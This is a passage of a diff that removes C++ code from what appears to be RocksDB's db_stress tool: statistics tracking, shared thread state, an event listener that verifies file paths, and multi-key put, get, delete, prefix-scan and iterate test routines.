-    iterator_size_sums_ = 0;
-    founds_ = 0;
-    iterations_ = 0;
-    range_deletions_ = 0;
-    covered_by_range_deletions_ = 0;
-    errors_ = 0;
-    bytes_ = 0;
-    seconds_ = 0;
-    num_compact_files_succeed_ = 0;
-    num_compact_files_failed_ = 0;
-    start_ = FLAGS_env->NowMicros();
-    last_op_finish_ = start_;
-    finish_ = start_;
-  }
-
-  void Merge(const Stats& other) {
-    hist_.Merge(other.hist_);
-    done_ += other.done_;
-    gets_ += other.gets_;
-    prefixes_ += other.prefixes_;
-    writes_ += other.writes_;
-    deletes_ += other.deletes_;
-    single_deletes_ += other.single_deletes_;
-    iterator_size_sums_ += other.iterator_size_sums_;
-    founds_ += other.founds_;
-    iterations_ += other.iterations_;
-    range_deletions_ += other.range_deletions_;
-    covered_by_range_deletions_ = other.covered_by_range_deletions_;
-    errors_ += other.errors_;
-    bytes_ += other.bytes_;
-    seconds_ += other.seconds_;
-    num_compact_files_succeed_ += other.num_compact_files_succeed_;
-    num_compact_files_failed_ += other.num_compact_files_failed_;
-    if (other.start_ < start_) start_ = other.start_;
-    if (other.finish_ > finish_) finish_ = other.finish_;
-  }
-
-  void Stop() {
-    finish_ = FLAGS_env->NowMicros();
-    seconds_ = (finish_ - start_) * 1e-6;
-  }
-
-  void FinishedSingleOp() {
-    if (FLAGS_histogram) {
-      auto now = FLAGS_env->NowMicros();
-      auto micros = now - last_op_finish_;
-      hist_.Add(micros);
-      if (micros > 20000) {
-        fprintf(stdout, "long op: %" PRIu64 " micros%30s\r", micros, "");
-      }
-      last_op_finish_ = now;
-    }
-
-      done_++;
-    if (FLAGS_progress_reports) {
-      if (done_ >= next_report_) {
-        if      (next_report_ < 1000)   next_report_ += 100;
-        else if (next_report_ < 5000)   next_report_ += 500;
-        else if (next_report_ < 10000)  next_report_ += 1000;
-        else if (next_report_ < 50000)  next_report_ += 5000;
-        else if (next_report_ < 100000) next_report_ += 10000;
-        else if (next_report_ < 500000) next_report_ += 50000;
-        else                            next_report_ += 100000;
-        fprintf(stdout, "... finished %ld ops%30s\r", done_, "");
-      }
-    }
-  }
-
-  void AddBytesForWrites(int nwrites, size_t nbytes) {
-    writes_ += nwrites;
-    bytes_ += nbytes;
-  }
-
-  void AddGets(int ngets, int nfounds) {
-    founds_ += nfounds;
-    gets_ += ngets;
-  }
-
-  void AddPrefixes(int nprefixes, int count) {
-    prefixes_ += nprefixes;
-    iterator_size_sums_ += count;
-  }
-
-  void AddIterations(int n) {
-    iterations_ += n;
-  }
-
-  void AddDeletes(int n) {
-    deletes_ += n;
-  }
-
-  void AddSingleDeletes(size_t n) { single_deletes_ += n; }
-
-  void AddRangeDeletions(int n) {
-    range_deletions_ += n;
-  }
-
-  void AddCoveredByRangeDeletions(int n) {
-    covered_by_range_deletions_ += n;
-  }
-
-  void AddErrors(int n) {
-    errors_ += n;
-  }
-
-  void AddNumCompactFilesSucceed(int n) { num_compact_files_succeed_ += n; }
-
-  void AddNumCompactFilesFailed(int n) { num_compact_files_failed_ += n; }
-
-  void Report(const char* name) {
-    std::string extra;
-    if (bytes_ < 1 || done_ < 1) {
-      fprintf(stderr, "No writes or ops?\n");
-      return;
-    }
-
-    double elapsed = (finish_ - start_) * 1e-6;
-    double bytes_mb = bytes_ / 1048576.0;
-    double rate = bytes_mb / elapsed;
-    double throughput = (double)done_/elapsed;
-
-    fprintf(stdout, "%-12s: ", name);
-    fprintf(stdout, "%.3f micros/op %ld ops/sec\n",
-            seconds_ * 1e6 / done_, (long)throughput);
-    fprintf(stdout, "%-12s: Wrote %.2f MB (%.2f MB/sec) (%ld%% of %ld ops)\n",
-            "", bytes_mb, rate, (100*writes_)/done_, done_);
-    fprintf(stdout, "%-12s: Wrote %ld times\n", "", writes_);
-    fprintf(stdout, "%-12s: Deleted %ld times\n", "", deletes_);
-    fprintf(stdout, "%-12s: Single deleted %" ROCKSDB_PRIszt " times\n", "",
-           single_deletes_);
-    fprintf(stdout, "%-12s: %ld read and %ld found the key\n", "",
-            gets_, founds_);
-    fprintf(stdout, "%-12s: Prefix scanned %ld times\n", "", prefixes_);
-    fprintf(stdout, "%-12s: Iterator size sum is %ld\n", "",
-            iterator_size_sums_);
-    fprintf(stdout, "%-12s: Iterated %ld times\n", "", iterations_);
-    fprintf(stdout, "%-12s: Deleted %ld key-ranges\n", "", range_deletions_);
-    fprintf(stdout, "%-12s: Range deletions covered %ld keys\n", "",
-            covered_by_range_deletions_);
-
-    fprintf(stdout, "%-12s: Got errors %ld times\n", "", errors_);
-    fprintf(stdout, "%-12s: %ld CompactFiles() succeed\n", "",
-            num_compact_files_succeed_);
-    fprintf(stdout, "%-12s: %ld CompactFiles() did not succeed\n", "",
-            num_compact_files_failed_);
-
-    if (FLAGS_histogram) {
-      fprintf(stdout, "Microseconds per op:\n%s\n", hist_.ToString().c_str());
-    }
-    fflush(stdout);
-  }
-};
-
-// State shared by all concurrent executions of the same benchmark.
-class SharedState {
- public:
-  static const uint32_t SENTINEL;
-
-  explicit SharedState(StressTest* stress_test)
-      : cv_(&mu_),
-        seed_(static_cast<uint32_t>(FLAGS_seed)),
-        max_key_(FLAGS_max_key),
-        log2_keys_per_lock_(static_cast<uint32_t>(FLAGS_log2_keys_per_lock)),
-        num_threads_(FLAGS_threads),
-        num_initialized_(0),
-        num_populated_(0),
-        vote_reopen_(0),
-        num_done_(0),
-        start_(false),
-        start_verify_(false),
-        should_stop_bg_thread_(false),
-        bg_thread_finished_(false),
-        stress_test_(stress_test),
-        verification_failure_(false),
-        no_overwrite_ids_(FLAGS_column_families) {
-    // Pick random keys in each column family that will not experience
-    // overwrite
-
-    printf("Choosing random keys with no overwrite\n");
-    Random rnd(seed_);
-    size_t num_no_overwrite_keys = (max_key_ * FLAGS_nooverwritepercent) / 100;
-    for (auto& cf_ids : no_overwrite_ids_) {
-      for (size_t i = 0; i < num_no_overwrite_keys; i++) {
-        size_t rand_key;
-        do {
-          rand_key = rnd.Next() % max_key_;
-        } while (cf_ids.find(rand_key) != cf_ids.end());
-        cf_ids.insert(rand_key);
-      }
-      assert(cf_ids.size() == num_no_overwrite_keys);
-    }
-
-    if (FLAGS_test_batches_snapshots) {
-      fprintf(stdout, "No lock creation because test_batches_snapshots set\n");
-      return;
-    }
-    values_.resize(FLAGS_column_families);
-
-    for (int i = 0; i < FLAGS_column_families; ++i) {
-      values_[i] = std::vector<uint32_t>(max_key_, SENTINEL);
-    }
-
-    long num_locks = static_cast<long>(max_key_ >> log2_keys_per_lock_);
-    if (max_key_ & ((1 << log2_keys_per_lock_) - 1)) {
-      num_locks++;
-    }
-    fprintf(stdout, "Creating %ld locks\n", num_locks * FLAGS_column_families);
-    key_locks_.resize(FLAGS_column_families);
-
-    for (int i = 0; i < FLAGS_column_families; ++i) {
-      key_locks_[i].resize(num_locks);
-      for (auto& ptr : key_locks_[i]) {
-        ptr.reset(new port::Mutex);
-      }
-    }
-  }
-
-  ~SharedState() {}
-
-  port::Mutex* GetMutex() {
-    return &mu_;
-  }
-
-  port::CondVar* GetCondVar() {
-    return &cv_;
-  }
-
-  StressTest* GetStressTest() const {
-    return stress_test_;
-  }
-
-  int64_t GetMaxKey() const {
-    return max_key_;
-  }
-
-  uint32_t GetNumThreads() const {
-    return num_threads_;
-  }
-
-  void IncInitialized() {
-    num_initialized_++;
-  }
-
-  void IncOperated() {
-    num_populated_++;
-  }
-
-  void IncDone() {
-    num_done_++;
-  }
-
-  void IncVotedReopen() {
-    vote_reopen_ = (vote_reopen_ + 1) % num_threads_;
-  }
-
-  bool AllInitialized() const {
-    return num_initialized_ >= num_threads_;
-  }
-
-  bool AllOperated() const {
-    return num_populated_ >= num_threads_;
-  }
-
-  bool AllDone() const {
-    return num_done_ >= num_threads_;
-  }
-
-  bool AllVotedReopen() {
-    return (vote_reopen_ == 0);
-  }
-
-  void SetStart() {
-    start_ = true;
-  }
-
-  void SetStartVerify() {
-    start_verify_ = true;
-  }
-
-  bool Started() const {
-    return start_;
-  }
-
-  bool VerifyStarted() const {
-    return start_verify_;
-  }
-
-  void SetVerificationFailure() { verification_failure_.store(true); }
-
-  bool HasVerificationFailedYet() { return verification_failure_.load(); }
-
-  port::Mutex* GetMutexForKey(int cf, long key) {
-    return key_locks_[cf][key >> log2_keys_per_lock_].get();
-  }
-
-  void LockColumnFamily(int cf) {
-    for (auto& mutex : key_locks_[cf]) {
-      mutex->Lock();
-    }
-  }
-
-  void UnlockColumnFamily(int cf) {
-    for (auto& mutex : key_locks_[cf]) {
-      mutex->Unlock();
-    }
-  }
-
-  void ClearColumnFamily(int cf) {
-    std::fill(values_[cf].begin(), values_[cf].end(), SENTINEL);
-  }
-
-  void Put(int cf, int64_t key, uint32_t value_base) {
-    values_[cf][key] = value_base;
-  }
-
-  uint32_t Get(int cf, int64_t key) const { return values_[cf][key]; }
-
-  void Delete(int cf, int64_t key) { values_[cf][key] = SENTINEL; }
-
-  void SingleDelete(int cf, int64_t key) { values_[cf][key] = SENTINEL; }
-
-  int DeleteRange(int cf, int64_t begin_key, int64_t end_key) {
-    int covered = 0;
-    for (int64_t key = begin_key; key < end_key; ++key) {
-      if (values_[cf][key] != SENTINEL) {
-        ++covered;
-      }
-      values_[cf][key] = SENTINEL;
-    }
-    return covered;
-  }
-
-  bool AllowsOverwrite(int cf, int64_t key) {
-    return no_overwrite_ids_[cf].find(key) == no_overwrite_ids_[cf].end();
-  }
-
-  bool Exists(int cf, int64_t key) { return values_[cf][key] != SENTINEL; }
-
-  uint32_t GetSeed() const { return seed_; }
-
-  void SetShouldStopBgThread() { should_stop_bg_thread_ = true; }
-
-  bool ShoudStopBgThread() { return should_stop_bg_thread_; }
-
-  void SetBgThreadFinish() { bg_thread_finished_ = true; }
-
-  bool BgThreadFinished() const { return bg_thread_finished_; }
-
- private:
-  port::Mutex mu_;
-  port::CondVar cv_;
-  const uint32_t seed_;
-  const int64_t max_key_;
-  const uint32_t log2_keys_per_lock_;
-  const int num_threads_;
-  long num_initialized_;
-  long num_populated_;
-  long vote_reopen_;
-  long num_done_;
-  bool start_;
-  bool start_verify_;
-  bool should_stop_bg_thread_;
-  bool bg_thread_finished_;
-  StressTest* stress_test_;
-  std::atomic<bool> verification_failure_;
-
-  // Keys that should not be overwritten
-  std::vector<std::set<size_t> > no_overwrite_ids_;
-
-  std::vector<std::vector<uint32_t>> values_;
-  // Has to make it owned by a smart ptr as port::Mutex is not copyable
-  // and storing it in the container may require copying depending on the impl.
-  std::vector<std::vector<std::unique_ptr<port::Mutex> > > key_locks_;
-};
-
-const uint32_t SharedState::SENTINEL = 0xffffffff;
-
-// Per-thread state for concurrent executions of the same benchmark.
-struct ThreadState {
-  uint32_t tid; // 0..n-1
-  Random rand;  // Has different seeds for different threads
-  SharedState* shared;
-  Stats stats;
-
-  ThreadState(uint32_t index, SharedState* _shared)
-      : tid(index), rand(1000 + index + _shared->GetSeed()), shared(_shared) {}
-};
-
-class DbStressListener : public EventListener {
- public:
-  DbStressListener(const std::string& db_name,
-                   const std::vector<DbPath>& db_paths)
-      : db_name_(db_name), db_paths_(db_paths) {}
-  virtual ~DbStressListener() {}
-#ifndef ROCKSDB_LITE
-  virtual void OnFlushCompleted(DB* db, const FlushJobInfo& info) override {
-    assert(db);
-    assert(db->GetName() == db_name_);
-    assert(IsValidColumnFamilyName(info.cf_name));
-    VerifyFilePath(info.file_path);
-    // pretending doing some work here
-    std::this_thread::sleep_for(
-        std::chrono::microseconds(Random::GetTLSInstance()->Uniform(5000)));
-  }
-
-  virtual void OnCompactionCompleted(DB* db,
-                                     const CompactionJobInfo& ci) override {
-    assert(db);
-    assert(db->GetName() == db_name_);
-    assert(IsValidColumnFamilyName(ci.cf_name));
-    assert(ci.input_files.size() + ci.output_files.size() > 0U);
-    for (const auto& file_path : ci.input_files) {
-      VerifyFilePath(file_path);
-    }
-    for (const auto& file_path : ci.output_files) {
-      VerifyFilePath(file_path);
-    }
-    // pretending doing some work here
-    std::this_thread::sleep_for(
-        std::chrono::microseconds(Random::GetTLSInstance()->Uniform(5000)));
-  }
-
-  virtual void OnTableFileCreated(const TableFileCreationInfo& info) override {
-    assert(info.db_name == db_name_);
-    assert(IsValidColumnFamilyName(info.cf_name));
-    VerifyFilePath(info.file_path);
-    assert(info.job_id > 0 || FLAGS_compact_files_one_in > 0);
-    if (info.status.ok()) {
-      assert(info.file_size > 0);
-      assert(info.table_properties.data_size > 0);
-      assert(info.table_properties.raw_key_size > 0);
-      assert(info.table_properties.num_entries > 0);
-    }
-  }
-
- protected:
-  bool IsValidColumnFamilyName(const std::string& cf_name) const {
-    if (cf_name == kDefaultColumnFamilyName) {
-      return true;
-    }
-    // The column family names in the stress tests are numbers.
-    for (size_t i = 0; i < cf_name.size(); ++i) {
-      if (cf_name[i] < '0' || cf_name[i] > '9') {
-        return false;
-      }
-    }
-    return true;
-  }
-
-  void VerifyFileDir(const std::string& file_dir) {
-#ifndef NDEBUG
-    if (db_name_ == file_dir) {
-      return;
-    }
-    for (const auto& db_path : db_paths_) {
-      if (db_path.path == file_dir) {
-        return;
-      }
-    }
-    assert(false);
-#endif  // !NDEBUG
-  }
-
-  void VerifyFileName(const std::string& file_name) {
-#ifndef NDEBUG
-    uint64_t file_number;
-    FileType file_type;
-    bool result = ParseFileName(file_name, &file_number, &file_type);
-    assert(result);
-    assert(file_type == kTableFile);
-#endif  // !NDEBUG
-  }
-
-  void VerifyFilePath(const std::string& file_path) {
-#ifndef NDEBUG
-    size_t pos = file_path.find_last_of("/");
-    if (pos == std::string::npos) {
-      VerifyFileName(file_path);
-    } else {
-      if (pos > 0) {
-        VerifyFileDir(file_path.substr(0, pos));
-      }
-      VerifyFileName(file_path.substr(pos));
-    }
-#endif  // !NDEBUG
-  }
-#endif  // !ROCKSDB_LITE
-
- private:
-  std::string db_name_;
-  std::vector<DbPath> db_paths_;
-};
-
-}  // namespace
-
-class StressTest {
- public:
-  StressTest()
-      : cache_(NewCache(FLAGS_cache_size)),
-        compressed_cache_(NewLRUCache(FLAGS_compressed_cache_size)),
-        filter_policy_(FLAGS_bloom_bits >= 0
-                           ? FLAGS_use_block_based_filter
-                                 ? NewBloomFilterPolicy(FLAGS_bloom_bits, true)
-                                 : NewBloomFilterPolicy(FLAGS_bloom_bits, false)
-                           : nullptr),
-        db_(nullptr),
-        new_column_family_name_(1),
-        num_times_reopened_(0) {
-    if (FLAGS_destroy_db_initially) {
-      std::vector<std::string> files;
-      FLAGS_env->GetChildren(FLAGS_db, &files);
-      for (unsigned int i = 0; i < files.size(); i++) {
-        if (Slice(files[i]).starts_with("heap-")) {
-          FLAGS_env->DeleteFile(FLAGS_db + "/" + files[i]);
-        }
-      }
-      DestroyDB(FLAGS_db, Options());
-    }
-  }
-
-  ~StressTest() {
-    for (auto cf : column_families_) {
-      delete cf;
-    }
-    column_families_.clear();
-    delete db_;
-  }
-
-  std::shared_ptr<Cache> NewCache(size_t capacity) {
-    if (capacity <= 0) {
-      return nullptr;
-    }
-    if (FLAGS_use_clock_cache) {
-      auto cache = NewClockCache((size_t)capacity);
-      if (!cache) {
-        fprintf(stderr, "Clock cache not supported.");
-        exit(1);
-      }
-      return cache;
-    } else {
-      return NewLRUCache((size_t)capacity);
-    }
-  }
-
-  bool BuildOptionsTable() {
-    if (FLAGS_set_options_one_in <= 0) {
-      return true;
-    }
-
-    std::unordered_map<std::string, std::vector<std::string> > options_tbl = {
-        {"write_buffer_size",
-         {ToString(FLAGS_write_buffer_size),
-          ToString(FLAGS_write_buffer_size * 2),
-          ToString(FLAGS_write_buffer_size * 4)}},
-        {"max_write_buffer_number",
-         {ToString(FLAGS_max_write_buffer_number),
-          ToString(FLAGS_max_write_buffer_number * 2),
-          ToString(FLAGS_max_write_buffer_number * 4)}},
-        {"arena_block_size",
-         {
-             ToString(Options().arena_block_size),
-             ToString(FLAGS_write_buffer_size / 4),
-             ToString(FLAGS_write_buffer_size / 8),
-         }},
-        {"memtable_huge_page_size", {"0", ToString(2 * 1024 * 1024)}},
-        {"max_successive_merges", {"0", "2", "4"}},
-        {"inplace_update_num_locks", {"100", "200", "300"}},
-        // TODO(ljin): enable test for this option
-        // {"disable_auto_compactions", {"100", "200", "300"}},
-        {"soft_rate_limit", {"0", "0.5", "0.9"}},
-        {"hard_rate_limit", {"0", "1.1", "2.0"}},
-        {"level0_file_num_compaction_trigger",
-         {
-             ToString(FLAGS_level0_file_num_compaction_trigger),
-             ToString(FLAGS_level0_file_num_compaction_trigger + 2),
-             ToString(FLAGS_level0_file_num_compaction_trigger + 4),
-         }},
-        {"level0_slowdown_writes_trigger",
-         {
-             ToString(FLAGS_level0_slowdown_writes_trigger),
-             ToString(FLAGS_level0_slowdown_writes_trigger + 2),
-             ToString(FLAGS_level0_slowdown_writes_trigger + 4),
-         }},
-        {"level0_stop_writes_trigger",
-         {
-             ToString(FLAGS_level0_stop_writes_trigger),
-             ToString(FLAGS_level0_stop_writes_trigger + 2),
-             ToString(FLAGS_level0_stop_writes_trigger + 4),
-         }},
-        {"max_compaction_bytes",
-         {
-             ToString(FLAGS_target_file_size_base * 5),
-             ToString(FLAGS_target_file_size_base * 15),
-             ToString(FLAGS_target_file_size_base * 100),
-         }},
-        {"target_file_size_base",
-         {
-             ToString(FLAGS_target_file_size_base),
-             ToString(FLAGS_target_file_size_base * 2),
-             ToString(FLAGS_target_file_size_base * 4),
-         }},
-        {"target_file_size_multiplier",
-         {
-             ToString(FLAGS_target_file_size_multiplier), "1", "2",
-         }},
-        {"max_bytes_for_level_base",
-         {
-             ToString(FLAGS_max_bytes_for_level_base / 2),
-             ToString(FLAGS_max_bytes_for_level_base),
-             ToString(FLAGS_max_bytes_for_level_base * 2),
-         }},
-        {"max_bytes_for_level_multiplier",
-         {
-             ToString(FLAGS_max_bytes_for_level_multiplier), "1", "2",
-         }},
-        {"max_sequential_skip_in_iterations", {"4", "8", "12"}},
-        {"use_direct_reads", {"false", "true"}},
-        {"use_direct_io_for_flush_and_compaction", {"false", "true"}},
-    };
-
-    options_table_ = std::move(options_tbl);
-
-    for (const auto& iter : options_table_) {
-      options_index_.push_back(iter.first);
-    }
-    return true;
-  }
-
-  bool Run() {
-    PrintEnv();
-    BuildOptionsTable();
-    Open();
-    SharedState shared(this);
-    uint32_t n = shared.GetNumThreads();
-
-    std::vector<ThreadState*> threads(n);
-    for (uint32_t i = 0; i < n; i++) {
-      threads[i] = new ThreadState(i, &shared);
-      FLAGS_env->StartThread(ThreadBody, threads[i]);
-    }
-    ThreadState bg_thread(0, &shared);
-    if (FLAGS_compaction_thread_pool_adjust_interval > 0) {
-      FLAGS_env->StartThread(PoolSizeChangeThread, &bg_thread);
-    }
-
-    // Each thread goes through the following states:
-    // initializing -> wait for others to init -> read/populate/depopulate
-    // wait for others to operate -> verify -> done
-
-    {
-      MutexLock l(shared.GetMutex());
-      while (!shared.AllInitialized()) {
-        shared.GetCondVar()->Wait();
-      }
-
-      auto now = FLAGS_env->NowMicros();
-      fprintf(stdout, "%s Starting database operations\n",
-              FLAGS_env->TimeToString(now/1000000).c_str());
-
-      shared.SetStart();
-      shared.GetCondVar()->SignalAll();
-      while (!shared.AllOperated()) {
-        shared.GetCondVar()->Wait();
-      }
-
-      now = FLAGS_env->NowMicros();
-      if (FLAGS_test_batches_snapshots) {
-        fprintf(stdout, "%s Limited verification already done during gets\n",
-                FLAGS_env->TimeToString((uint64_t) now/1000000).c_str());
-      } else {
-        fprintf(stdout, "%s Starting verification\n",
-                FLAGS_env->TimeToString((uint64_t) now/1000000).c_str());
-      }
-
-      shared.SetStartVerify();
-      shared.GetCondVar()->SignalAll();
-      while (!shared.AllDone()) {
-        shared.GetCondVar()->Wait();
-      }
-    }
-
-    for (unsigned int i = 1; i < n; i++) {
-      threads[0]->stats.Merge(threads[i]->stats);
-    }
-    threads[0]->stats.Report("Stress Test");
-
-    for (unsigned int i = 0; i < n; i++) {
-      delete threads[i];
-      threads[i] = nullptr;
-    }
-    auto now = FLAGS_env->NowMicros();
-    if (!FLAGS_test_batches_snapshots && !shared.HasVerificationFailedYet()) {
-      fprintf(stdout, "%s Verification successful\n",
-              FLAGS_env->TimeToString(now/1000000).c_str());
-    }
-    PrintStatistics();
-
-    if (FLAGS_compaction_thread_pool_adjust_interval > 0) {
-      MutexLock l(shared.GetMutex());
-      shared.SetShouldStopBgThread();
-      while (!shared.BgThreadFinished()) {
-        shared.GetCondVar()->Wait();
-      }
-    }
-
-    if (shared.HasVerificationFailedYet()) {
-      printf("Verification failed :(\n");
-      return false;
-    }
-    return true;
-  }
-
- private:
-
-  static void ThreadBody(void* v) {
-    ThreadState* thread = reinterpret_cast<ThreadState*>(v);
-    SharedState* shared = thread->shared;
-
-    {
-      MutexLock l(shared->GetMutex());
-      shared->IncInitialized();
-      if (shared->AllInitialized()) {
-        shared->GetCondVar()->SignalAll();
-      }
-      while (!shared->Started()) {
-        shared->GetCondVar()->Wait();
-      }
-    }
-    thread->shared->GetStressTest()->OperateDb(thread);
-
-    {
-      MutexLock l(shared->GetMutex());
-      shared->IncOperated();
-      if (shared->AllOperated()) {
-        shared->GetCondVar()->SignalAll();
-      }
-      while (!shared->VerifyStarted()) {
-        shared->GetCondVar()->Wait();
-      }
-    }
-
-    if (!FLAGS_test_batches_snapshots) {
-      thread->shared->GetStressTest()->VerifyDb(thread);
-    }
-
-    {
-      MutexLock l(shared->GetMutex());
-      shared->IncDone();
-      if (shared->AllDone()) {
-        shared->GetCondVar()->SignalAll();
-      }
-    }
-
-  }
-
-  static void PoolSizeChangeThread(void* v) {
-    assert(FLAGS_compaction_thread_pool_adjust_interval > 0);
-    ThreadState* thread = reinterpret_cast<ThreadState*>(v);
-    SharedState* shared = thread->shared;
-
-    while (true) {
-      {
-        MutexLock l(shared->GetMutex());
-        if (shared->ShoudStopBgThread()) {
-          shared->SetBgThreadFinish();
-          shared->GetCondVar()->SignalAll();
-          return;
-        }
-      }
-
-      auto thread_pool_size_base = FLAGS_max_background_compactions;
-      auto thread_pool_size_var = FLAGS_compaction_thread_pool_variations;
-      int new_thread_pool_size =
-          thread_pool_size_base - thread_pool_size_var +
-          thread->rand.Next() % (thread_pool_size_var * 2 + 1);
-      if (new_thread_pool_size < 1) {
-        new_thread_pool_size = 1;
-      }
-      FLAGS_env->SetBackgroundThreads(new_thread_pool_size);
-      // Sleep up to 3 seconds
-      FLAGS_env->SleepForMicroseconds(
-          thread->rand.Next() % FLAGS_compaction_thread_pool_adjust_interval *
-              1000 +
-          1);
-    }
-  }
-
-  // Given a key K and value V, this puts ("0"+K, "0"+V), ("1"+K, "1"+V), ...
-  // ("9"+K, "9"+V) in DB atomically i.e in a single batch.
-  // Also refer MultiGet.
-  Status MultiPut(ThreadState* thread, const WriteOptions& writeoptions,
-                  ColumnFamilyHandle* column_family, const Slice& key,
-                  const Slice& value, size_t sz) {
-    std::string keys[10] = {"9", "8", "7", "6", "5",
-                            "4", "3", "2", "1", "0"};
-    std::string values[10] = {"9", "8", "7", "6", "5",
-                              "4", "3", "2", "1", "0"};
-    Slice value_slices[10];
-    WriteBatch batch;
-    Status s;
-    for (int i = 0; i < 10; i++) {
-      keys[i] += key.ToString();
-      values[i] += value.ToString();
-      value_slices[i] = values[i];
-      if (FLAGS_use_merge) {
-        batch.Merge(column_family, keys[i], value_slices[i]);
-      } else {
-        batch.Put(column_family, keys[i], value_slices[i]);
-      }
-    }
-
-    s = db_->Write(writeoptions, &batch);
-    if (!s.ok()) {
-      fprintf(stderr, "multiput error: %s\n", s.ToString().c_str());
-      thread->stats.AddErrors(1);
-    } else {
-      // we did 10 writes each of size sz + 1
-      thread->stats.AddBytesForWrites(10, (sz + 1) * 10);
-    }
-
-    return s;
-  }
-
-  // Given a key K, this deletes ("0"+K), ("1"+K),... ("9"+K)
-  // in DB atomically i.e in a single batch. Also refer MultiGet.
-  Status MultiDelete(ThreadState* thread, const WriteOptions& writeoptions,
-                     ColumnFamilyHandle* column_family, const Slice& key) {
-    std::string keys[10] = {"9", "7", "5", "3", "1",
-                            "8", "6", "4", "2", "0"};
-
-    WriteBatch batch;
-    Status s;
-    for (int i = 0; i < 10; i++) {
-      keys[i] += key.ToString();
-      batch.Delete(column_family, keys[i]);
-    }
-
-    s = db_->Write(writeoptions, &batch);
-    if (!s.ok()) {
-      fprintf(stderr, "multidelete error: %s\n", s.ToString().c_str());
-      thread->stats.AddErrors(1);
-    } else {
-      thread->stats.AddDeletes(10);
-    }
-
-    return s;
-  }
-
-  // Given a key K, this gets values for "0"+K, "1"+K,..."9"+K
-  // in the same snapshot, and verifies that all the values are of the form
-  // "0"+V, "1"+V,..."9"+V.
-  // ASSUMES that MultiPut was used to put (K, V) into the DB.
-  Status MultiGet(ThreadState* thread, const ReadOptions& readoptions,
-                  ColumnFamilyHandle* column_family, const Slice& key,
-                  std::string* value) {
-    std::string keys[10] = {"0", "1", "2", "3", "4", "5", "6", "7", "8", "9"};
-    Slice key_slices[10];
-    std::string values[10];
-    ReadOptions readoptionscopy = readoptions;
-    readoptionscopy.snapshot = db_->GetSnapshot();
-    Status s;
-    for (int i = 0; i < 10; i++) {
-      keys[i] += key.ToString();
-      key_slices[i] = keys[i];
-      s = db_->Get(readoptionscopy, column_family, key_slices[i], value);
-      if (!s.ok() && !s.IsNotFound()) {
-        fprintf(stderr, "get error: %s\n", s.ToString().c_str());
-        values[i] = "";
-        thread->stats.AddErrors(1);
-        // we continue after error rather than exiting so that we can
-        // find more errors if any
-      } else if (s.IsNotFound()) {
-        values[i] = "";
-        thread->stats.AddGets(1, 0);
-      } else {
-        values[i] = *value;
-
-        char expected_prefix = (keys[i])[0];
-        char actual_prefix = (values[i])[0];
-        if (actual_prefix != expected_prefix) {
-          fprintf(stderr, "error expected prefix = %c actual = %c\n",
-                  expected_prefix, actual_prefix);
-        }
-        (values[i])[0] = ' '; // blank out the differing character
-        thread->stats.AddGets(1, 1);
-      }
-    }
-    db_->ReleaseSnapshot(readoptionscopy.snapshot);
-
-    // Now that we retrieved all values, check that they all match
-    for (int i = 1; i < 10; i++) {
-      if (values[i] != values[0]) {
-        fprintf(stderr, "error : inconsistent values for key %s: %s, %s\n",
-                key.ToString(true).c_str(), StringToHex(values[0]).c_str(),
-                StringToHex(values[i]).c_str());
-      // we continue after error rather than exiting so that we can
-      // find more errors if any
-      }
-    }
-
-    return s;
-  }
-
-  // Given a key, this does prefix scans for "0"+P, "1"+P,..."9"+P
-  // in the same snapshot where P is the first FLAGS_prefix_size - 1 bytes
-  // of the key. Each of these 10 scans returns a series of values;
-  // each series should be the same length, and it is verified for each
-  // index i that all the i'th values are of the form "0"+V, "1"+V,..."9"+V.
-  // ASSUMES that MultiPut was used to put (K, V)
-  Status MultiPrefixScan(ThreadState* thread, const ReadOptions& readoptions,
-                         ColumnFamilyHandle* column_family,
-                         const Slice& key) {
-    std::string prefixes[10] = {"0", "1", "2", "3", "4",
-                                "5", "6", "7", "8", "9"};
-    Slice prefix_slices[10];
-    ReadOptions readoptionscopy[10];
-    const Snapshot* snapshot = db_->GetSnapshot();
-    Iterator* iters[10];
-    Status s = Status::OK();
-    for (int i = 0; i < 10; i++) {
-      prefixes[i] += key.ToString();
-      prefixes[i].resize(FLAGS_prefix_size);
-      prefix_slices[i] = Slice(prefixes[i]);
-      readoptionscopy[i] = readoptions;
-      readoptionscopy[i].snapshot = snapshot;
-      iters[i] = db_->NewIterator(readoptionscopy[i], column_family);
-      iters[i]->Seek(prefix_slices[i]);
-    }
-
-    int count = 0;
-    while (iters[0]->Valid() && iters[0]->key().starts_with(prefix_slices[0])) {
-      count++;
-      std::string values[10];
-      // get list of all values for this iteration
-      for (int i = 0; i < 10; i++) {
-        // no iterator should finish before the first one
-        assert(iters[i]->Valid() &&
-               iters[i]->key().starts_with(prefix_slices[i]));
-        values[i] = iters[i]->value().ToString();
-
-        char expected_first = (prefixes[i])[0];
-        char actual_first = (values[i])[0];
-
-        if (actual_first != expected_first) {
-          fprintf(stderr, "error expected first = %c actual = %c\n",
-                  expected_first, actual_first);
-        }
-        (values[i])[0] = ' '; // blank out the differing character
-      }
-      // make sure all values are equivalent
-      for (int i = 0; i < 10; i++) {
-        if (values[i] != values[0]) {
-          fprintf(stderr, "error : %d, inconsistent values for prefix %s: %s, %s\n",
-                  i, prefixes[i].c_str(), StringToHex(values[0]).c_str(),
-                  StringToHex(values[i]).c_str());
-          // we continue after error rather than exiting so that we can
-          // find more errors if any
-        }
-        iters[i]->Next();
-      }
-    }
-
-    // cleanup iterators and snapshot
-    for (int i = 0; i < 10; i++) {
-      // if the first iterator finished, they should have all finished
-      assert(!iters[i]->Valid() ||
-             !iters[i]->key().starts_with(prefix_slices[i]));
-      assert(iters[i]->status().ok());
-      delete iters[i];
-    }
-    db_->ReleaseSnapshot(snapshot);
-
-    if (s.ok()) {
-      thread->stats.AddPrefixes(1, count);
-    } else {
-      thread->stats.AddErrors(1);
-    }
-
-    return s;
-  }
-
-  // Given a key K, this creates an iterator which scans to K and then
-  // does a random sequence of Next/Prev operations.
-  Status MultiIterate(ThreadState* thread, const ReadOptions& readoptions,
-                      ColumnFamilyHandle* column_family, const Slice& key) {
-    Status s;
-    const Snapshot* snapshot = db_->GetSnapshot();
-    ReadOptions readoptionscopy = readoptions;
-    readoptionscopy.snapshot = snapshot;
-    unique_ptr<Iterator> iter(db_->NewIterator(readoptionscopy, column_family));
-
-    iter->Seek(key);
-    for (uint64_t i = 0; i < FLAGS_num_iterations && iter->Valid(); i++) {
-      if (thread->rand.OneIn(2)) {
-        iter->Next();
-      } else {
-        iter->Prev();
-      }
-    }
-
-    if (s.ok()) {
-      thread->stats.AddIterations(1);
-    } else {
-      thread->stats.AddErrors(1);
